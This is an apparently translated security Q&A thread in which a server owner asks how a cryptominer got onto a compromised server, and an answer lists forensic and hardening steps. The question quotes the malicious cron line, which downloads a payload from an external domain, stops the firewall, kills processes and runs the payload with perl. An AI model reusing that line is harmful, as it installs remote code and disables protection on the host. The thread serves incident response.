il mio server è stato violato e ho solo potuto trovare il comando cronjob [duplicato]

1

Ho installato i rilevatori di Clamav e rootkit e non hanno trovato nulla.

Il virus esegue alcuni processi denominati moduli che mangiano cpu, il mio server venditore mi ha detto che è un virus bitcoin miner ma non mi hanno dato altre informazioni. L'unica cosa che ho scoperto è questo cronjob:

*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish

Ho ucciso tutto il processo e rimosso il cronjob. La cartella / tmp è vuota. Il problema è che non ho trovato il "problema" di base. Cos'altro posso fare?

    
posta Amir Bar 09.01.2017 - 12:17
fonte

1 risposta

2

Da quello che hai detto, è difficile dire se il server è stato violato tramite la tua app / sito web, o tramite qualche software obsoleto, o in qualche altro modo, ma alcune cose che potresti provare:

  • Controlla i tuoi log di apache / nginx e prova a trovare le richieste sospette.
  • Verifica le versioni del software server (server web, perl, php ...) e cerca versioni obsolete.
  • Fai un portscan con nmap e cerca le porte che sono aperte ma non dovrebbe essere.
  • Fai una scansione veloce con nikto o qualche altro scanner di sicurezza webapp. Prova wpscan se stai usando wordpress.
  • Continua a monitorare le connessioni in uscita e cerca attività sospette.
  • Modifica le tue password.
  • Chiedi / paga qualcuno per valutare la sicurezza della tua app Web.

Ma fondamentalmente solo i file di log potevano individuare la causa principale. Gli altri metodi possono identificare le vulnerabilità, ma in questo caso non è possibile stabilire se siano state utilizzate dall'hacker.

    
risposta data 09.01.2017 - 12:41
fonte

Leggi altre domande sui tag